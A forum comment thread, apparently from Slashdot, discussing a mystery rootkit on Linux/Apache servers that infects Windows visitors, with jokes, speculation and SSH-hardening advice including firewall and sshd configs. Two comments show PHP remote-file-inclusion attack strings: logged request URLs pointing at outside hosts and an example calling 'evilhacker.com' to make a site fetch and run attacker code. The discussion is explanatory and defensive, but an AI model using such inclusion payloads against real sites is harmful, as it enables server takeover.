Mystery Malware Affecting Linux/Apache Web Servers

lisah writes "Reports are beginning to surface that some Web servers running Linux and Apache are unwittingly infecting thousands of computers, exploiting vulnerabilities in QuickTime, Yahoo! Messenger, and Windows. One way to tell if your machine is infected is if you're unable to create a directory name beginning with a numeral. Since details are still sketchy, the best advice right now is to take proactive steps to secure your servers. 'We asked the Apache Software Foundation if it had any advice on how to detect the rootkit or cleanse a server when it's found. According to Mark Cox of the Apache security team, "Whilst details are thin as to how the attackers gained root access to the compromised servers, we currently have no evidence that this is due to an unfixed vulnerability in the Apache HTTP Server." We sent a similar query to Red Hat, the largest vendor of Linux, but all its security team could tell us was that "At this point in time we have not had access to any affected machines and therefore cannot give guidance on which tools would reliably detect the rootkit."'"

Should have used IIS

[by Anonymous Coward]

This is why serious businesses choose a serious web server: Microsoft Internet Information Services running on Microsoft Windows Server.

Re:Should have used IIS

[Shaman (1148)]

Hahahahahaha hah aha aha aha hahahahaaha bwahahahaha ...wait, you're joking, right?

Re:Should have used IIS

[uberushaximus (1025976)]

Of course not, this is internet, internet is serious business, we do not 'joke' here.

Re:Should have used IIS

[Niten (201835)]

In all seriousness though, IIS 6 has a pretty darn good security track record; seemingly better than Apache 2's, even if it is blasphemy for me to say it. I've previously decried the use of raw vulnerability statistics to make comparative claims about different products' security [slashdot.org], but I think the fact that such a widely-deployed product as IIS 6 has been found to have only a single remote access vulnerability in the last four years [secunia.com] really speaks for itself.

I mean, I'm just a Unix guy who's never had much use for a Windows web server, but that's my $0.02...

LOLserver?

[KublaiKhan (522918)]

IIS are serious server. This are serious thread.

Re:LOLserver?

[by Anonymous Coward]

Is can be rootkit tiem now plz?

Re:LOLserver?

[davidsyes (765062)]

That are be unpossible.

Re:Is Idiocracy coming true?

[zcat_NZ (267672)]

happy geek has run out of happy :-(

Something's fishy!

[linumax (910946)]

Last night I discovered a directory named 53 4B 59 4E 45 54 in my home folder.

Re:Something's fishy!

[JeepFanatic (993244)]

If you run those values through a hex to ascii converter you get SKYNET

Re:Something's fishy!

[Trigun (685027)]

Are those Bra sizes? You're into some weird shit man.

Re:Something's fishy!

[sukotto (122876)]

Yeah, mine had 4 8 15 16 23 42

and all sorts of weird stuff's started happening in the server room

Re:Something's fishy!

[geminidomino (614729)]

I saw that on someone's shirt last week when I went to my spanish class at night school. I spent 25 minutes before class trying to figure out the pattern.

Now I google it and I see it's from a dumbass TV show. I'm pissed off.

Hummm, no ahah ?!

[DirtyFly (765689)]

I do believe tht if this story was with IIS it would be tagged ahah :)

Re:Hummm, no ahah ?!

[Detritus (11846)]

He's on a little-endian system.

press release??

[by Anonymous Coward]

"According to a press release issued earlier this month ..."

Yawn.

Am I safe?

[Solra Bizna (716281)]

Does this rootkit work on a hardened Gentoo install with no LKM support on SPARC64? :P

-:sigma.SB

Re:Am I safe?

[by Anonymous Coward]

Does this rootkit work on a hardened Gentoo install with no LKM support on SPARC64? :P

Maybe; they're still compiling it.

Re:Am I safe?

[GreggBz (777373)]

Yes, but you have to compile it.

Re:Am I safe?

[bigredradio (631970)]

Your safe. NOTHING will run on that system. ;-)

mkdir 1

[hey (83763)]

I can see thousand of people trying to make numeric directories :)
Yes, also if you can run your tummy while patting your head you aren't infected also.
I think.... this crazy idea is the virus!

Read it careful people...

[cbart387 (1192883)]

The servers are linux (because of an access issue. The computers being hurt by this are windows. At least that's how I read the article (see quote from article below).

According to a press release issued earlier this month by Finjan, a security research firm, compromised Web servers are infecting thousands of visitors daily with malware that turns their Windows machines into unwitting bots to do the bidding of an as yet unidentified criminal organization. Security firms ScanSafe and SecureWorks have since added their own takes on the situation, though with varying estimates on the number of sites affected. All reports thus far say the compromised servers are running Linux and Apache.

Re:Read it careful people...

[jawtheshark (198669)]

I do not know how you interpret this, but a rooted server, Linux, FreeBSD, OpenBSD or even Windows is also a "harmed" computer. Yes, clients will get infected, but the servers are in deep trouble too.

Can't be malware

[Anonymous MadCoe (613739)]

It's for Apache/Linux so it must be well crafted code written with the best intention....

Isn't that always the case with FOSS. If it was for Microsoft then it would be _real_ malware....

Re:Can't be malware

[geminidomino (614729)]

It's for Apache/Linux so it must be well crafted code written with the best intention....

Then how do you explain PHP?

*sniff sniff* Is something burning?

What are the common factors?

[Arrogant-Bastard (141720)]

To figure out what the compromise vector is, it's probably going to be necessary to figure out what the compromised servers have in common -- and how that differs from uncompromised servers. (Keeping in mind that currently-uncompromised servers may have the same vulnerability, and that attackers or their software just may not have gotten to them yet.)

I'd suggest enumerating factors such as OS, OS version, remote access methods (ssh, ftp, etc.), Apache versions, Apache modules, add-ons like CPanel, network/ASN, and so on -- anything could be a culprit at this point.

And that includes things that have nothing to do with Linux or Apache: for example, it's possible that the attackers acquired root passwords by infecting Windows systems used by administrators -- then just waited for them to initiate ssh sessions to their servers. It'd probably be best to leave all possibilities open and consider them equally likely until evidence starts accumulating in favor of/against them. (In re-reading that last statement, I suppose it sounds a bit trite. I'm just trying to discourage premature conclusions that anything is at fault until somebody can produce evidence to support saying so.)

Re:What are the common factors?

[whoever57 (658626)]

To figure out what the compromise vector is, it's probably going to be necessary to figure out what the compromised servers have in common -- and how that differs from uncompromised servers. (Keeping in mind that currently-uncompromised servers may have the same vulnerability, and that attackers or their software just may not have gotten to them yet.)

Perhaps this is the end result of all those dictionary attacks against SSH servers that we have seen for the past 2-3 years. Inevitably, some of those attacks will have been successful. Perhaps the successful logins have not ben exploited until now.

Re:Fail2ban

[whoever57 (658626)]

Fail2ban is another nice way to deal with these brute force attacks.

You can use fail2ban, but SSH can be protected very nicely with Netfilter/IPTABLES -- just limit the rate of new connections to something like 3 per 3 minutes for each host and this will slow down any dictionary attack to the point that it is very unlikely to be successful.

Re:What are the common factors?

[imipak (254310)]

Apparently it's not Cpanel.

Other info as of last week:

Various discussions:
http://www.webhostingtalk.com/showthread.php?t=651748 [webhostingtalk.com]
(useful discussion starts on page 3 or so)
http://www.theregister.co.uk/2008/01/11/mysterious_web_infection/ [theregister.co.uk]
(describes the inability of ScanSafe to work out what's happening)
Trend have a piece on their blog:
http://blog.trendmicro.com/e-commerce-sites-invaded/ [trendmicro.com]
SANS/ISC
http://isc.sans.org/diary.php?storyid=3834&rss [sans.org]

The register's older writeup on this ...

[chris.dag (22141)]

The Register has been on this for a while and although the story is older it is better written and has more interesting details: http://www.channelregister.co.uk/2008/01/16/mysterious_web_infection_continues/ [channelregister.co.uk]

my $.02 of course

ssh + bad password

[Panaflex (13191)]

I see this type of attack all the time, the fact that someone automated it and gave it a zombie machine is not surprising.

* Don't allow root to ssh into your machine.
* Disable ssh1.
* Limit sudoers.
* Have good passwords.
* ???
* PROFIT!!

Seems like a formula everyone should know.

Re:ssh + bad password

[Panaflex (13191)]

Sorry, I wasn't clear:

I've had admins on my network simply copy both pub & private ssh keys from server to server (they're in the same directory). They leave the private keys on the machine and forget or don't know what they've done. An attacker with root on that machine can then su into the account and access other machines.

Re:ssh + bad password

[ls671 (1122017)]

You should also have some process that completely blocks ssh login attempts from a given IP after so many failed login attempts instead of letting the hi-jacker poll your machine for as long as he wishes.

Re:ssh + bad password

[Niten (201835)]

I'll see your good point, and raise you a pf.conf snippet:

### MACROS AND TABLES SECTION
table <wan_bruteforce> persist

### PACKET FILTERING SECTION
block in quick on $if_wan inet from <wan_bruteforce>
# ...
pass in on $if_wan inet proto tcp from any to ($if_wan) \
port ssh flags S/SFRA synproxy state \
(max-src-conn-rate 3/30, overload <wan_bruteforce> flush global)

That's how you can block non-massively-distributed password dictionary attacks on the BSDs, anyway. Sadly, the fact that OpenBSD's firewall can perform this task on its own means that we probably won't see this feature worked into OpenSSH itself any time soon -- so on Linux you'll need a third-party script such as DenyHosts [sourceforge.net], as others have already pointed out.

(And yeah, unlike this PF configuration, DenyHosts lets you synchronize your table with a sort of universal blacklist of blocked hosts, so some might choose to run it on BSD anyway. It sounds like a good idea on paper, but boy does it suck when your home IP address keeps inexplicably winding up on the blacklist due to what turns out to be a single site's massively misconfigured server.)

But I think the most important lesson to be learned here, assuming that this thing does turn out to be an ssh attack, is that allowing single-factor, password-based administrative logins to a highly connected host is never a good idea. If you have the luxury of complete control over the site and its users (or are simply a highly empowered BOFH), disable password-based logins entirely and force the use of ssh public keys:

# /etc/ssh/sshd_config
PubkeyAuthentication yes
ChallengeResponseAuthentication no
PasswordAuthentication no
KerberosAuthentication no
GSSApiAuthentication no
UsePAM no

As a concession, if you want to ensure access without having to carry around an encryption key on a USB dongle, on Linux you can use PAM and libpam-opie to set up secondary access using a dual-factor combination of an S/Key one-time password and your regular login password (S/Key [wikipedia.org] is like Steve Gibson's much-trumpeted "Perfect Paper Passwords [grc.com]" system, which is ingenious in its own right, except that S/Key is designed so that you don't need to keep your secret key stored unencrypted on the very server you're worried about protecting):

# /etc/ssh/sshd_config
PubkeyAuthentication yes
ChallengeResponseAuthentication yes
PasswordAuthentication no
KerberosAuthentication no
GSSApiAuthentication no
UsePAM yes

# /etc/pam.d/ssh
auth requisite pam_opie.so
auth required pam_unix.so nullok_secure

With the above configuration you can still log in seamlessly using your ssh private key. But if you get stuck somewhere without access to your private key, you just pull your S/Key passwords list out of your pocket and enter the next password in the sequence, as prompted, followed by your login password. This PAM configuration has the nice property that if you enter the correct S/Key password but then an incorrect Unix password, you will be asked for the next one-time password in the sequence before you can continue: so unless your attacker is exceptionally good at plaintext attacks on large cryptographic hashes, a successful brute-force attack becomes impossible.

Wow, this post got a lot longer than I wanted it to... I'm, um, going out to get some fresh air or something.

lighttpd

[Apreche (239272)]

Is the way to go.

A thousand ways

[Evets (629327)]

There are a thousand ways to root a machine, and there are a lot of ways to configure apache so that it's either very secure or very insecure - but really apache is just one attack vector. Being that all the machines that exhibited distribution of the windows malware, it may be a common configuration problem between those servers - but how many servers do they know about that were distributing the software? 10? 1000? 10,000? You would think if there were that many of them it there would be incremental backups that you could look through to see what was going on in the system.

Logically assuming that it is just a handful of servers based on the fact that nobody has pinpointed the problem, more likely it's that the server admins are either the problem, or it is an attack on a very specific configuration and software combination.

More details are available...

[by Anonymous Coward]

... though a solution has not been yet:

http://blog.trendmicro.com/e-commerce-sites-invaded/ [trendmicro.com]

If you happen to have one of these compromised systems, I am sure that Trend would like to talk to you about it...

I'm not sure I buy it

[mlwmohawk (801821)]

There is something suspicious about this report. Some things can't happen the way people say they happen, and when that is the case we have to look at more likely scenarios.

I would bet the path of the TCP/IP packets route through compromised providers who have an injection strategy. Remember a few months ago how IPSs were injecting their own java script and ads into the pages of other sites?

http://ars.userfriendly.org/cartoons/?id=20070703 [userfriendly.org]

This is the most likely scenario I can think of.

I call Bullshit!

[by Anonymous Coward]

FTFA:FTFA - "The random js toolkit was detected using Finjan's patented real-time code inspection technology while diagnosing users' web traffic during December 2007..."

This is all just a ploy to bring attention to Finjan for financial gain!

All your BASE are belong to us

[davidwr (791652)]

All your BASE [w3.org] are belong to us.

Im not from this planet MONKEY BOY!

[ekimminau (775300)]

Just remember, wherever you go, there you are.

Wait a Minute!

[SwashbucklingCowboy (727629)]

This is obviously not true. After all, Linux zealots constantly say that Linux isn't vulnerable to malware...

Sounds like a cPanel issue

[druiid (109068)]

The articles on this keep mentioning cPanel. Now, I've never used or looked at that specific web CP, but it seems likely to me all the attackers would have to do is find a vulnerability on of the scripts used for updating the configs, or adding a DB entry to update the configs, etc. Yes, I know this supposition is light on detail, but given what most control panels eventually have to have access to, seems the more likely than some mystery apache exploit... just tell the scripts they need to update the configs.. or use them to push an update to the machine, etc.

Mystery h18.ru requests??

[tdashton (664960)]

Seems as good of a place as any to mention it, but maybe it has something to do with the multitudes of requests for URLs like: /exclusives.php?id=hxxp://amymusicgirl.h17.ru/mysong.txt?
/exclusives.php?id=hxxp://amyru.h18.ru/images/cs.txt?
/exclusives.php?id=hxxp://joioiskioeriyyskwkdwjsdfewis.land.ru/.html/body?

( tt changed to xx in protocol )

that I've been seeing in my logs for the last 8 months or more.. Or are these just a poor attempt to spam webmasters?

HMMM

Re:Mystery h18.ru requests??

[liquidpele (663430)]

No, it's not. It's php RFI attacks.

If you code does this:
incdlue($_GET['module']."/index.php");

The attacker does this:
http://yoursite.com?module=http://evilhacker.com/code.txt [yoursite.com]?

Your php then gets and runs code.txt, which of course is actually php code.
Makes for a *very* easy and cheap way of taking over servers.

mod_security protects against this pretty well with an easy regex rule.

Identified about 5 months ago

[fmavituna (681125)]

I identified this rootkit in a system about 5 months ago and slightly documented some behaviours of it (I think only behaviour I've missed was numerical directory thingy). Related blog post 25.08.2007 - http://ferruh.mavituna.com/makale/exploit-paketleri/ [mavituna.com] ).

There is one more thing to add, it modify all valid HTTP responses, add .js after body tag in all interfaces. There was one article that mentioned most of the compromised servers based UK, it was same for me. And considering it's been about 5 months, I assume UK websites were prime target in the start.

So much for the myth that Linux cannot be infected

[Orion Blastar (457579)]

with malware because Linux is a hostile environment.

Unix systems can be infected, like the original Arpanet worm that Robert Morris Jr. was accused of writing that infected Sendmail Unix servers.

I had run a Linux server in the past for my web server and I noticed things like that which forced me to reformat the system because Linux was acting funny with directory names and log files kept being deleted for no reason, to hide the malware infections and/or hacking attempts.

Related to Fasthosts Breakin

[caller9 (764851)]

"Last week, ScanSafe's Landesman drew a link between the security breach at UK-based Fasthosts and the site hacks, saying then that the domains ScanSafe had found infected had, or had recently had, a relationship with Fasthosts."

http://www.techworld.com/security/news/index.cfm?newsid=11184 [techworld.com]

It's not a software flaw according to Landesman. Its stupid admins not changing passwords or with a lingering delayed infection from the initial theft.

Which will be first?

[PinkyDead (862370)]

The Microsoft Ad Campaign denouncing the evils of open source or the Linux Patch fixing the problem?

Rooted or Gained root access

[jonoton (804262)]

There is a bit of a difference.

In the article they are speculating that the vector may have been a root password compromise. There are several ways of getting at this, it could be a weak password, it could be a brute force attack against an obtained password file, it could be social engineering.

You'd be surprised how many weak root passwords there are out there, my home machine was recently the victim of a dictionary attack (my own stupid fault - weak password on a seldom used account got compromised). They did not get root, I've run forensics on the compromised disk however it was still used to scan other machines for ssh access. I found and stopped it within 12 hours, but in that time it had found over 30 machines it could SSH into including one with the root password 'root'.

There is no technical solution to poor administration, a well maintained Windows system will be more secure than a poorly maintained Linux system.

Jumping to conclusions (as usual)

[cwells (58526)]

Does anyone have proof that root was achieved through an Apache exploit?

Tisk tisk, bad admins

[jantman (967064)]

I can't seem to find any mentions of someone figuring out exactly what this exploit/problem/etc. is. Seems really weird. I mean, *someone* has to have an infected machine that can be looked at. And what about SysAdmins doing something to at least perform post-compromise analysis? Even my *personal* webserver logs over syslog-ng to an append-only filesystem, and Bacula runs nightly MD5sums of pretty much the whole FS (not to mention remotely downloading the bacula binary every night and MD5summing that). At the very least, someone should be able to verify the technical details.

Something here reeks of FUD....

"GUIs provide metaphors for users, they have no place in administration." - GREAT quote.

And as to IIS/Apache/whatever else... telling people to use IIS when a problem is found that may involve Apache is as stupid as telling IIS people to use Apache when (another) IIS bug is found. Software is buggy. When the likes of Amazon, Google, etc. use Apache (or base their servers on it), I think it can be considered stable enough for production use. All software has flaws. That's a fact of life. Telling people to use a different package becaause of one bug is as narrow-minded as telling people to sell their Hondas/Fords/Chevys/Toyotas because you saw one in the shop.

Re:Ubuntu as well?

[oedneil (871555)]

As Ubuntu is indeed Linux, I'd venture to guess that it is affected.

Re:Ubuntu as well?

[BorgCopyeditor (590345)]

But why male models?

Re:Ubuntu as well?

[wall0159 (881759)]

What's this nonsense? Ubuntu is Ubuntu. ...and that's kinda related to Mac, right? Just... more browner.

Re:Ubuntu as well?

[PrescriptionWarning (932687)]

"the current thinking is that the malware authors gained access to the servers using stolen root passwords"

so basically its most likely they used the traditional means of gaining access (not through holes, but merely through bad personal security practices regarding passwords and password management). And it only affects windows clients. So how is this problem not your typical someone cracked your machine? Oh wait, I smell Microsoft FUD... ewwwwww

Re:Ubuntu as well?

[nicklott (533496)]

Microsoft? This story is on posted on linux.com and being hyped on a OSDN site, where do microsoft come in? They must have a pretty deep mole to get this one planted...

Re:Ubuntu as well?

[Christianfreak (100697)]

Exactly. Also this gem from the article:

Other than using and safeguarding secure root passwords, not much can be done at this time to be proactive in preventing servers from being compromised,

Turn off root's log in and get rid of cPanel and similar programs as well. I understand the need for an easy to use remote admin tool (as much as I'd love people to actually learn the shell), but can't we do better than a web-based program for this stuff?

Re:Ubuntu as well?

[Skrynesaver (994435)]

There is no more powerful, nor easy to use, (with training), remote control tool for servers than ssh.

GUIs provide metaphors for users, they have no place in administration.

</grumpyOldFart>

Re:Ubuntu as well?

[stuntpope (19736)]

His main point was insightful. There are two parts to the story - one, Linux servers running Apache have been compromised. Two, these servers are infecting Windows clients through vulnerabilities in those clients. This exploit does not affect non-Windows computers.

If the current thinking is indeed that the Linux servers were inappropriately accessed through stolen passwords, how is that a security flaw of Linux or Apache? Like he asked, how is using a legitimate password equal to cracking the server?

On the other hand, turning Windows clients into bots *IS* an example of that software's (and QuickTime's and Yahoo! Messenger's) insecurity and vulnerability!

Re:Funny

[Undead Ed (1068120)]

According to the story (did you read it), it appears to be a situation where the root password has been compromised, not the applications or operating system.

Problems with IIS were as a result of vulns in the application and/or Windows operating system - totally different problem.

Would you blame a lock company if the user left his keys in the lock?

Ed

Re:Funny

[plague3106 (71849)]

I read it, here's what it said: "One great unknown thus far is how the servers come to be infected. Absent any forensic evidence of break-ins, the current thinking is that the malware authors gained access to the servers using stolen root passwords."

In other words, they have no idea how the servers were compromised. Because they can't find out how, they're guessing it was a root password that was stolen. In other words, its still just as likely a flaw in some software.

Re:Funny

[Undead Ed (1068120)]

"they're guessing it was a root password that was stolen"

A pretty good guess, otherwise we could expect to see millions of Apache web servers compromised (there are over 75 million Apache web servers in active service) and anticipate a much greater number of Windows clients infected.

The significance of this story is not that Windows clients are the target, the significance is that the infecting agent is originating from Apache/Linux servers.

Ed

Re:Funny

[studpuppy (624228)]

Would you blame a lock company if the user left his keys in the lock?"

Depends. How good is my lawyer?

Re:Funny

[cp.tar (871488)]

How many lawyers are good?

I think their class restricts them to Lawful Evil; should they change alignment, they et disbarred. So, none, at a guess.

Re:Funny

[Vellmont (569020)]

I think it's funny that Apache is affected by the same drama that affected IIS all those years ago.

Except IIS had security hole after security hole.

There's been no such security hole found in apache yet. So I'd wait before making comparisons to IIS.

Re:LISTEN UP

[by Anonymous Coward]

Underage anime? Does that refer to pictures drawn after 1990?

Re:Software sucks.

[by Anonymous Coward]

How is that flamebait? I'm dead serious. If the quality of software doesn't improve dramatically, we're going to be in a world of hurt very soon. How do you suggest we achieve that improvement if not by making authors of faulty software liable for their negligence? We certainly can't keep upgrading software every time a bug is found, if bugs keep cropping up at the current rate.

Re:Software sucks.

[vux984 (928602)]

It's high time for better software, and the only way to get that is to apply market pressure. Software liability is the answer.

1) If the market really wanted extensive 'software liability' then we'd already have it. Customers would demand it, suppliers would figure out how much it would cost to provide it, and prices would sort themselves out. Turns out the prices go WAY up, and customers (most of them) don't want to pay them.

2) What happens to Linux in a world with mandatory software liability? Who is liable? The company providing install and support? The volunteer contributor who wrote that line of code? The project maintainer who accepted the patch? ... And you wonder why your post was modded flaimbait?

Re:Ubuntu as well?

[symbolset (646467)]

It's possible to install software on a Linux webserver that exploits vulnerabilities in Windows clients. This is news?

Here's a shocker: it's possible to exploit Windows boxes with services hosted on a Commodore64.

Windows has more malware packages than legitimate software packages. They've really solved that ease of installation problem.

Re:Software sucks.

[Schraegstrichpunkt (931443)]

Yeah. People should be held liable when they know full well that Microsoft has a track record for bad security, but choose Microsoft products anyway.

Re:Software sucks.

[KublaiKhan (522918)]

Ain't the software that's at fault here--it's people who give out their root passwords, or have easily cracked root passwords.

Re:Software sucks.

[mlwmohawk (801821)]

Software has to suck because the market can't afford software that doesn't suck. Kids out of high school and collage or fresh out of joe's web school. aren't qualified to write good software, yet this is what companies hire over more experienced people.

Even then, there is no ability to develop your skills because you spend 99% of your time learning new environments.

Software is HUGELY complex these days and it takes a log of study, knowledge, and skill to be any good at it. Companies don't want to hear that. They want to increase productivity by "KLOC." (Un)fortunately, there is a lot of "art" and "creativity" in software development and without well defined product specs, rigid test plans, and quality assurance which adds delays and cost to a project you won't get better code.

Standard business upside potential vs downside risk. Upside potential: first to market, profit!!! Downside risk: blame some hacker.

Re:Bad PHP Code

[FlyingGuy (989135)]

Huh??

I am not clear on the concept you are suggesting. Do you mean something like:

• include $_GET['some_get_value'] ;

Re:Breaking news--CERT has uncovered mkdir hack

[sticks_us (150624)]

I gotta confess--I'm a little dismayed this code snippet (how many of those do you see around here lately?) got modded down--as a troll, no less! This (working) example uses actual mkdir.c source code, and it was with great care that I crafted the "novelty" portion. Its reference to a popular frist prost style of comment was actually intended to be a parody--a puckish satire--of the whole genre.

Perhaps the point of the joke was too subtle. TFA made it sound like there were actually malicious individuals out there intent on rooting your box and replacing mkdir with an oddly quirky and ridiculously hobbled version--to what end, nobody knows. The example above was intended to illustrate the idiocy of the notion, and thus derail the entire fools' errand that comprises the paranoid schizophrenic who fears miniscule modifications to mkdir.

Re:Software sucks.

[marcello_dl (667940)]

Then go buy software which gives you such guarantees, and see the market decide if your installation is to be preferred over lower cost- no guarantee ones that competition might use. But posting your opinion about liability on an Apache/Linux comment thread is off-topic. See apache license

      8. Limitation of Liability. In no event and under no legal theory,
            whether in tort (including negligence), contract, or otherwise,
            unless required by applicable law (such as deliberate and grossly
            negligent acts) or agreed to in writing, shall any Contributor be
            liable to You for damages, including any direct, indirect, special,
            incidental, or consequential damages of any character arising as a
            result of this License or out of the use or inability to use the
            Work (including but not limited to damages for loss of goodwill,
            work stoppage, computer failure or malfunction, or any and all
            other commercial damages or losses), even if such Contributor
            has been advised of the possibility of such damages.

Re:Software sucks.

[deep-deep-blue (1055812)]

Is it possible that this would be a hardware (CPU) exploit ? I ... I am a sw developer ...

Re:zOMG, THE FOSS!!!11!!

[Hucko (998827)]

Wus. I want more baby, Ooh yeah! You know I love it!